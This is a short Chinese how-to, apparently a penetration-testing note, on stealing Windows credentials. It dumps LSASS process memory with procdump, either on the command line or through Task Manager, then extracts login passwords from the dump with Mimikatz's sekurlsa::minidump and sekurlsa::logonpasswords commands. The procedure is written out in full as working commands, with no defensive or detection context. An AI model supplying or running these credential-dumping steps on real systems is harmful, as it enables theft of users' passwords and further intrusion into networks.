思路:
就是通过系统自带的procdump去下载存储用户名密码的文件(应该不能那么说这个文件,但是这样理解没问题),然后用猕猴桃读取。
procdump.exe
Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中.
procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
下载dmp命令:
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
会提示保存的地址,然后放到猕猴桃下面
然后使用猕猴桃(Mimikatz)进行读取
读取命令:
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
「废话」
关于dmp的导出也可以是这样的:
1.对于NT6可以使用windows自带的功能进行dump:
任务管理器—进程—显示所有用户进程—找到lsass—右键“创建转储文件”